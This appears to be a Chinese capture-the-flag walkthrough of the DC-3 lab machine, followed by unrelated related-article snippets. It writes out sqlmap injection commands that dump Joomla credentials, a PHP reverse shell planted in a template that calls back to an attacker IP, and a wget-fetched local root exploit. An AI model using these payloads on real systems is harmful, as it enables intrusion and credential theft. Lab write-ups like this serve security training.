DC系列 DC:3

news2024/11/30 20:32:08

DC系列 DC:3

文章目录

  • DC系列 DC:3
    • 调试靶机
    • 信息收集
      • IP端口信息收集
    • 框架漏洞利用
      • joomscan扫描工具利用
      • msf工具利用(无法使用)
      • kali漏洞库利用
      • sqlmap利用
    • 文件上传
    • 提权

调试靶机

点击虚拟机设置选择CD/DVD点击高级将IDE调成画面中这个选项
在这里插入图片描述

信息收集

IP端口信息收集

对自己网段进行扫描快速锁定ip
arp-scan 10.4.7.0/24
在这里插入图片描述
nmap -A 10.4.7.22对端口服务进行详细扫描
在这里插入图片描述
可以看到目标机开放着http服务 框架为joomla

框架漏洞利用

joomscan扫描工具利用

用joomscan对改目标机进行扫描
joomscan -u http://10.4.7.22 --ec
在这里插入图片描述

msf工具利用(无法使用)

用msf查找版本漏洞
在这里插入图片描述
使用漏洞并使用php/meterpreter/reverse_tcp攻击载荷
在这里插入图片描述
添加攻击地址进行攻击发现没用连不上
在这里插入图片描述

kali漏洞库利用

在kali的漏洞库里进行搜索漏洞
searchsploit oomla 3.7.0
在这里插入图片描述
发现该版本是存在sql注入漏洞的我们查看该文件

  • locate php/webapps/42033.txt获取文件绝对路径
  • cat /usr/share/exploitdb/exploits/php/webapps/42033.txt查看文件
    在这里插入图片描述

sqlmap利用

给我们提供了该框架sql注入的地址和sqlmap语句我们直接跑
sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs
在这里插入图片描述
可能时间会有点长最后跑出5个库
在这里插入图片描述
我们继续跑查看joomladb库里有什么

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" --tables   

在这里插入图片描述
跑出来user表我们继续跑里面的字段

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" -T "#__users" --column  

在这里插入图片描述
跑出来很多字段我们重点关注username和password
在这里插入图片描述
我们跑出来看看

sqlmap -u "http://10.4.7.22/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"  -D "joomladb" -T "#__users" -C "username,password" --dump 

得到了账号密码但密码时加密的
在这里插入图片描述
我们用将密钥保存到文档里用john进行解密
在这里插入图片描述
得到密码snooy我们去joomla进行登录
这个页面joomscan扫到的
在这里插入图片描述
用账号密码进行登录
在这里插入图片描述
登录成功

文件上传

在extcnsions里选择templates中的templates里选择第二个(已经试过第一个了没反应)
在这里插入图片描述
找到index.php
在这里插入图片描述
上传小马

$sock = fsockopen("10.4.7.3", "10002");

$descriptorspec = array(

        0 => $sock,

        1 => $sock,

        2 => $sock

);

$process = proc_open('/bin/sh', $descriptorspec, $pipes);

proc_close($process);

点击保存
在这里插入图片描述
kali开启nc nc -lvvp 10002
在这里插入图片描述

访问index.php页面http://10.4.7.22/index.php
在这里插入图片描述
反弹成功
在这里插入图片描述

提权

进来之后先加一层壳python -c "import pty;pty.spawn('/bin/bash')"
在这里插入图片描述
查询系统版本cat /etc/*release
在这里插入图片描述
发现版本是Ubuntu 16.04去kali漏洞库里进行搜索searchsploit Ubuntu 16.04
在这里插入图片描述
下载下来查看searchsploit -m 39772.txt
在这里插入图片描述
查看文本文件 cat 39772.txt
在这里插入图片描述
发现该文件给了我们要使用的文件方法 并且跟我们说使用完60秒内就会变为root权限 并且给了我们下载地址
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip我们进行下载
在这里插入图片描述
下载完成我进行了解压传入了kali
在这里插入图片描述
在里面找到exploit.tar文件并在当前目录开启http服务传入目标机python -m http.server 80
在这里插入图片描述
在shell里cd 到tmp目录下用wget命令传入靶机http://10.4.7.3/exploit.tar
在这里插入图片描述
用tar命令进行解压tar xvf exploit.tar
在这里插入图片描述
cd到解压好的文件夹里对脚本文件进行赋权777 chmod 777 compile.sh chmod 777 doubleput.c
在这里插入图片描述
执行两个脚本文件
第一个执行时可能会报错但是没事进行执行第二个就好
/compile.sh
在这里插入图片描述
./doubleput
在这里插入图片描述
执行完成等待一会就成为root了
cd到root下拿下旗帜
在这里插入图片描述

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1165681.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【实战Flask API项目指南】之七 用JWT进行用户认证与授权

实战Flask API项目指南之 用JWT进行用户认证与授权 本系列文章将带你深入探索实战Flask API项目指南,通过跟随小菜的学习之旅,你将逐步掌握 Flask 在实际项目中的应用。让我们一起踏上这个精彩的学习之旅吧! 前言 当小菜踏入Flask后端开发…

java匿名类

什么是匿名实现类? 定义: 在java中,匿名实现类对象是一种特殊的对象,它是通过匿名类来创建的。匿名类是一个没有名字的类,它是在代码中直接定义和实例化的。匿名实现类对象通常用于实现接口或者扩展类,因为…

Express框架开发接口之实现七牛云上传图片功能

安装和配置multer 注意:使用express.urlencoded()中间件无法解析multipart/form-data格式的请求体 数据。 当前项目,推荐使用 multer 来解析multipart/form-data格式的表单数据。https://www.npmjs.com/package/multer npm i multer 导入并配置multer &a…

【Apifox新支持】如何管理与调试 Dubbo 项目?

一、引入Dubbo3 不会介绍 Dubbo 如何使用,咱只提一嘴,然后说如何去测试 Dubbo 服务。Dubbo3 除了保持 2.x 的经典架构之外,还以解决微服务的进程通信为主要职责,通过丰富的服务治理能力来更好的管控微服务服务集群,简…

(免费领源码)java#springboot#MYSQL 电影推荐网站30760-计算机毕业设计项目选题推荐

摘 要 随着互联网时代的到来,同时计算机网络技术高速发展,网络管理运用也变得越来越广泛。因此,建立一个B/S结构的电影推荐网站;电影推荐网站的管理工作系统化、规范化,也会提高平台形象,提高管理效率。 本…

玩转AIGC(人工智能生成内容)需要一些小技巧

玩转AIGC(人工智能生成内容)的确需要一些技巧,而Prompt提示词的选择非常关键,可以影响到生成的答案。以下是一些与AI对话的技巧和咒语示例: 1,明确问题 确保你的Prompt清晰明了,包括主题、问题…

领星ERP如何无需API开发轻松连接OA、电商、营销、CRM、用户运营、推广、客服等近千款系统

领星ERP(LINGXING)是一款专业的一站式亚马逊管理系统,帮助卖家构建完整的数据化运营闭环。,致力于为跨境电商卖家提供精细化运营和业财一体化的解决方案。 官网:https://erp.lingxing.com 集简云无代码集成平台&…

四川思维跳动:抖店运营服务商的运营方案

抖店运营服务商,作为一种新兴的商业模式,正逐渐受到广大电商从业者的重视和青睐。抖店运营方案不仅可以帮助创业者快速进入电商行业,还可以为他们提供全方位的运营支持和服务。下面四川思维跳动小编就来详细介绍一下抖店运营服务商的优势和价…

防止重复提交请求

前景提要: ts 简易封装 axios,统一 API 实现在 config 中配置开关拦截器 axios 实现请求 loading 效果 用一个数组保存当前请求的 url,此时还未响应。如果再次发起同样请求,比对 url 发现已经存在数组中,则拦截请求&a…

基于类电磁机制算法的无人机航迹规划-附代码

基于类电磁机制算法的无人机航迹规划 文章目录 基于类电磁机制算法的无人机航迹规划1.类电磁机制搜索算法2.无人机飞行环境建模3.无人机航迹规划建模4.实验结果4.1地图创建4.2 航迹规划 5.参考文献6.Matlab代码 摘要:本文主要介绍利用类电磁机制算法来优化无人机航迹…

【JAVA学习笔记】58 - 泛型

项目代码 https://github.com/yinhai1114/Java_Learning_Code/tree/main/IDEA_Chapter15/src/com/yinhai/generic_ https://github.com/yinhai1114/Java_Learning_Code/tree/main/IDEA_Chapter15/src/com/yinhai/customgeneric_ 一、泛型的入门和好处 1)请编写程序,…

c#的反编译工具ISPY和net reflector 使用比较

我有一份Asp.net程序需要修改,但没有源码,只有dll,需要使用反编译工具回复源码,尝试使用了市面上的两种主流的工具ISPY和net reflector ,最终用ISPY恢复了源码。 比较 ISPY 恢复的代码和实际有差距,但还能…

2023年高校大数据实训平台需求

2023 年大数据实训平台的需求量呈现出快速增长的趋势。随着大数据技术的不断普及和应用,越来越多的企业和高校意识到大数据人才培养的重要性。因此,对大数据实训平台的需求量不断增加。 据了解分析,大数据实训平台需求量增加包括以下方面的原…

系统架构设计师(第二版)学习笔记----层次式架构设计理论与实践

【原文链接】系统架构设计师(第二版)学习笔记----层次式架构设计理论与实践 文章目录 一、层次式体系结构概述1.1 软件体系结构的作用1.2 常用的层次式架构图1.3 层次式体系可能存在的问题点 二、表现层框架设计2.1 MVC模式2.1.1 MVC三层模式2.1.2 MVC设…

【错误解决方案】ModuleNotFoundError: No module named ‘pycocotools‘

1. 错误提示 在python程序中,通过导入一个名为pycocotools的模块,但Python提示找不到这个模块。 错误提示:ModuleNotFoundError: No module named pycocotools 2. 解决方案 pycocotools是一个Python包,它提供了用于处理COCO数据…

一文看懂MySQL 5.7和MySQL 8到底有哪些差异?

目录 ​编辑 引言 1、数据字典和系统表的变化 2、JSON支持的改进 3、新的数据类型 4、安全性增强 5、性能改进 6、InnoDB存储引擎的改进 结论 引言 MySQL作为最常用的开源关系型数据库管理系统之一,一直在不断发展和改进。随着时间的推移,MySQ…

项目管理-组织战略类型和层次讲解

组织战略类型和层次 对于不同的组织战略可能会采用不同的项目管理形式,组织作为项目管理的载体,其战略决策对项目管理体系的架构,对组织与项目之间责权利的划分具有深远的影响,组织的战略文化也会影响到项目的组织文化氛围。因此…

XSSFWorkbook读取模板,批量填充并导出文件

1、pom文件导入 <dependency><groupId>org.apache.poi</groupId><artifactId>poi</artifactId><version>4.1.0</version> </dependency> <dependency><groupId>org.apache.poi</groupId><artifactId>…

AoMao Editor (angular) 使用 window.print() 实现 html 导出 PDF 记录

目录 一、需求描述 二、使用 jspdf html2canvas 导出遇到的问题 三、window.print() 导出具体实现 【api: toHtml】 一、需求描述 将 AoMao Editor 富文本插件中的内容导出为PDF。 二、使用 jspdf html2canvas 导出遇到的问题 试了很多插件&#xff0c;但 angular 能用的…

NHANES | Roc曲线评估胰岛素抵抗替代物与育龄女性不孕症之间的关联

郑老师统计课程&#xff0c;欢迎点击报名&#xff1a;Nhanes公共数据库挖掘 课程 2023年10月12日&#xff0c;温州医科大学育英儿童医院附属第二医院妇产科学者在《BMC Public Health》&#xff08;三区&#xff0c;IF4.5&#xff09;发表题为&#xff1a;" Association b…